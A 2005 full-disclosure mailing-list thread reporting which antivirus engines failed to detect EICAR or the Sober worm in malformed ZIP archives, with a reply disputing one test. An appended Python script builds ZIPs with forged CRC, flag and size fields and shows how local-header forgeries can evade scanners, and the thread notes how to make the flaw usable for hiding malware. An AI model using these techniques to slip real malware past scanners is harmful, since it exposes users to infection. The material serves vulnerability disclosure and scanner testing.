Anti-Virus Malformed ZIP Archives flaws [UPDATE]

Thierry Zoller
14/06/05, 22:25
Dear List,

3 months have passed since it was reported that some AntiVirus
engines have flaws in regards to scanning malformed ZIP archives.
This is an update on the situation and hopefully a wake-up call
for some vendors.

3 months have passed and a few Anti-Virus engines _still_ are
"vulnerable" to this flaw. They either fail to detect the EICAR
string or Sober (worm) correctly in malformed ZIP archives. It should be
noted that the malformed ZIP archives open correctly using common
ZIP tools.

Original Advisory :
ftp://ftp.aerasec.de/pub/advisories/unfiltered-escape-sequences/
2005 AERAsec Network Services and Security GmbH - Dr. Peter Bieringer

http://bipin.sosvulnerable.net/crc.html
Several other flaws in regards to malformed ZIP archives.

My Anti-Virus Results from 15/03/2005 :
http://seclists.org/lists/fulldisclosure/2005/Mar/0556.html


Details as of 14/06/2005
************************

Products tested using
http://www.virustotal.com & http://virusscan.jotti.org/ :

AntiVir 6.31.0.5
AVG 718
Avira 6.31.0.5
BitDefender 7.0
ClamAV devel-20050501
DrWeb 4.32b
eTrust-Iris 7.1.194.0
eTrust-Vet 11.9.1.0
Fortinet 2.32.0.0
Ikarus 2.32
Kaspersky 4.0.2.24
McAfee 4513
NOD32v2 1.1139
Norman 5.70.10
Panda 8.02.00
Sybari 7.5.1314
Symantec 8.0
TheHacker 5.8-3.0
VBA32 3.10.3
ArcaVir
Avast
F-Prot Antivirus

no-escape-sequences-in-filename-eicar.zip
------------------------------------------
Anti-Virus products which failed this test :
Ikarus 2.32 updated on 06.14.2005
Symantec 8.0 updated on 06.13.2005

no-escape-sequences-in-filename-sober.l.zip
------------------------------------------
Failed :
Ikarus 2.32 updated 06.14.2005

unfiltered-escape-sequences-in-filename-eicar.zip
-------------------------------------------------
Failed :
Symantec 8.0
TheHacker 5.8-3.0
Ikarus 2.32

unfiltered-escape-sequences-in-filename-sober.l.zip
---------------------------------------------------
Failed :
TheHacker 5.8-3.0
Ikarus 2.32
AVG (ONLY ON JOTTI, Test done multiple times)

mixed2-eicar.zip AND mixed3-eicar.zip
---------------------------------------------------
Failed:
Symantec 8.0
TheHacker 5.8-3.0
Ikarus 2.32

mixed4-eicar.zip AND mixed-eicar-1.zip
---------------------------------------------------
Failed:
Ikarus 2.32

eicarcom2.zip
---------------------------------------------------
No Failures.

crc.zip (malformed CRC checksum)
---------------------------------------------------
Failed :
Symantec 8.0
NOD32 (ONLY ON JOTTI, Test done multiple times;
VirusTotal gives: "incorrect CRC checksum, the file may be
damaged")

gpbf.zip (general purpose bit flag hack)
---------------------------------------------------
Failed:
F-Prot Antivirus
Norman Virus Control (Jotti and VirusTotal)
ArcaVir
Symantec

long_coment.zip (long archive comment)
---------------------------------------------------
Failed :
Avast
AVG Antivirus
Symantec 8.0
DrWeb (Failed on VirusTotal, successful on Jotti)


Antigen.zip (fake compressed size and uncompressed size values)
---------------------------------------------------
Failed:
AntiVir
ArcaVir
Avast
BitDefender
ClamAV
Dr.Web
Fortinet
NOD32
Norman Virus Control
VBA32
Sybari 7.5.1314
Symantec 8.0
TheHacker 5.8-3.0
VBA32 3.10.3
McAfee 4513
eTrust-Iris 7.1.194.0
eTrust-Vet 11.9.1.0

(It should be noted that in order to really use this flaw to hide
malware the CRC value should be corrected AFTER changing the
compressed and uncompressed sizes)


eicar_com ♫?↔▲ยง .com .zip ( test_nav.zip)
----------------------------------------------------
Failed:
ClamAV
F-Prot Antivirus
Fortinet
Norman Virus Control

VirusTotal never managed to show the result for this file.



Regards,
Thierry Zoller
mailto:Thierry@sniff-em.com

Nicholas Knight
21/06/05, 15:55
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Thierry Zoller wrote:
> Antigen.zip (fake compressed size and uncompressed size values)
> ---------------------------------------------------
> Failed:

<snip>

> McAfee 4513

<snip>

The Antigen.zip test is flawed. The EICAR test file, by definition, is a
maximum of 128 bytes [1]. Technically, it shouldn't even have anything
other than the test string and whitespace in it. McAfee picks it up even
with garbage rather than whitespace after it, but only if it's small
enough (I tested it with the header sizes forged to 127 bytes instead of
255 [2] and McAfee picked it up just fine). Presumably, mindful of the
defined limitations of the EICAR test file, McAfee won't pick up EICAR
in files >128 bytes in order to avoid complications from EICAR appearing
in documents not intended for scanner testing (like [1]).

If you really want to find out if scanners are vulnerable to this,
you'll probably need to use a real virus in the zip.


[1] http://www.eicar.org/anti_virus_test_file.htm

[2] You can find the file I used here:
http://runawaynet.com/~nknight/avt/Antigen-forgedcrc-fixedsize.zip
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
Comment: Using GnuPG with Red Hat - http://enigmail.mozdev.org

iD8DBQFCtwzzUsZlh+GmLlQRAgADAKDFBu6gC+LEXVaholDSPq BZ1Vvq8QCdG97m
S+fxK1JfFLRDNa/vQsctTlg=
=Jr2u
-----END PGP SIGNATURE-----
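
The test archives in this thread are described only by name (malformed CRC, general purpose bit flag hack, long archive comment, fake compressed and uncompressed sizes, escape sequences in the filename). The Python script below is an added example, not code from either poster or from the linked advisories: it builds a one-entry stored ZIP around the EICAR string, applies a forgery of each of those kinds to the local file header, to the central directory, or to both, and checks whether Python's zipfile module, standing in for the "common ZIP tools" Zoller mentions, still extracts the payload. Assumptions the thread does not state: the gpbf variant flips bit 0 (the encryption flag), since the post does not say which bit was changed; the filename with ANSI escape sequences and the 60000-byte comment are constructed here; the value 255 for the forged sizes follows Knight's description of the Antigen.zip headers; the 128-byte ceiling is the EICAR definition Knight cites. The script also shows something the thread only observes: zipfile takes sizes, CRC and flags from the central directory, so forgeries confined to the local header pass through it unnoticed, while a scanner that walks local headers sequentially sees the forged values. Whether any particular 2005 engine failed for that reason is not something this page establishes.

```python
import struct
import zipfile
import zlib
from io import BytesIO

# The 68-byte EICAR test string, assembled from pieces at runtime so that this
# source file is not itself quarantined by a scanner.  EICAR is defined as a
# file of at most 128 bytes; that limit is the one Nicholas Knight's reply
# invokes against the Antigen.zip test.
EICAR = (b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$" + b"EICAR-STANDARD-"
         + b"ANTIVIRUS-TEST-FILE!$H+H*")
EICAR_MAX_LEN = 128

# Byte offsets of the fields we forge, inside the local file header (LFH) and
# the central directory header (CDH) respectively (PKWARE APPNOTE layout).
# Both records carry a copy of each value; a tool that trusts one copy while a
# scanner parses the other is the disagreement these test archives expose.
LFH_OFF = {"flags": 6, "crc": 14, "csize": 18, "usize": 22}
CDH_OFF = {"flags": 8, "crc": 16, "csize": 20, "usize": 24}
FIELD_FMT = {"flags": "<H", "crc": "<I", "csize": "<I", "usize": "<I"}


def build_zip(name, payload, comment=b""):
    """Return (bytearray, offsets) for a well-formed one-entry ZIP, method 0 (stored)."""
    crc, n = zlib.crc32(payload) & 0xFFFFFFFF, len(payload)
    mtime, mdate = (22 << 11) | (25 << 5), (25 << 9) | (6 << 5) | 14  # 2005-06-14 22:25
    lfh = struct.pack("<4s5H3I2H", b"PK\x03\x04", 10, 0, 0, mtime, mdate,
                      crc, n, n, len(name), 0) + name
    cd_start = len(lfh) + n
    cdh = struct.pack("<4s6H3I5H2I", b"PK\x01\x02", 20, 10, 0, 0, mtime, mdate,
                      crc, n, n, len(name), 0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack("<4s4H2IH", b"PK\x05\x06", 0, 0, 1, 1, len(cdh),
                       cd_start, len(comment)) + comment
    offsets = {"local": 0, "central": cd_start, "eocd": cd_start + len(cdh)}
    return bytearray(lfh + payload + cdh + eocd), offsets


def forge(zip_bytes, offsets, field, value, where="both"):
    """Overwrite `field` in the local header, the central directory, or both."""
    out = bytearray(zip_bytes)
    table = {"local": LFH_OFF, "central": CDH_OFF}
    for part in (("local", "central") if where == "both" else (where,)):
        struct.pack_into(FIELD_FMT[field], out, offsets[part] + table[part][field], value)
    return out


def set_comment(zip_bytes, offsets, comment):
    """Replace the archive comment: keep the EOCD record up to its comment-length
    field (offset 20 within the record), then write the new length and comment."""
    head = bytearray(zip_bytes[:offsets["eocd"] + 20])
    return head + struct.pack("<H", len(comment)) + comment


def opens_cleanly(zip_bytes, expected):
    """True if Python's zipfile (standing in for 'common ZIP tools') extracts the
    first entry and gets exactly `expected` back; False if it refuses."""
    try:
        with zipfile.ZipFile(BytesIO(bytes(zip_bytes))) as zf:
            return zf.read(zf.infolist()[0]) == expected
    except Exception:  # BadZipFile, RuntimeError or EOFError, depending on the Python version
        return False


def run_matrix(payload=EICAR):
    """Build variants modelled on the test archives named in the thread and report
    whether zipfile still opens each one (True) or rejects it (False)."""
    if len(payload) > EICAR_MAX_LEN:
        raise ValueError("EICAR test files must be at most 128 bytes")
    base, off = build_zip(b"eicar.com", payload)
    # Filename carrying raw ANSI escape sequences (constructed; not the page's file).
    esc, _ = build_zip(b"eicar\x1b[2J\x1b[31m.com", payload)

    def bad_sizes(where):  # fake compressed and uncompressed sizes, data left at 68 bytes
        return forge(forge(base, off, "csize", 255, where), off, "usize", 255, where)

    variants = {
        "baseline": base,
        "escape sequences in filename": esc,
        "bad CRC, local header only": forge(base, off, "crc", 0xDEADBEEF, "local"),
        "bad CRC, both headers": forge(base, off, "crc", 0xDEADBEEF),
        "gpbf bit 0 set, local only": forge(base, off, "flags", 0x0001, "local"),
        "gpbf bit 0 set, both": forge(base, off, "flags", 0x0001),
        "sizes forged to 255, local only": bad_sizes("local"),
        "sizes forged to 255, both": bad_sizes("both"),
        "60000-byte archive comment": set_comment(base, off, b"A" * 60000),
    }
    return {name: opens_cleanly(data, payload) for name, data in variants.items()}


if __name__ == "__main__":
    for name, ok in run_matrix().items():
        print(f"{name:34s} {'opens' if ok else 'REJECTED'}")
```

Run it directly to get one line per variant. The variants forged in both headers are the ones a tool and a scanner should both reject; the local-header-only variants are where a scanner that parses the archive differently from the extraction tool can be made to see a different file than the user does.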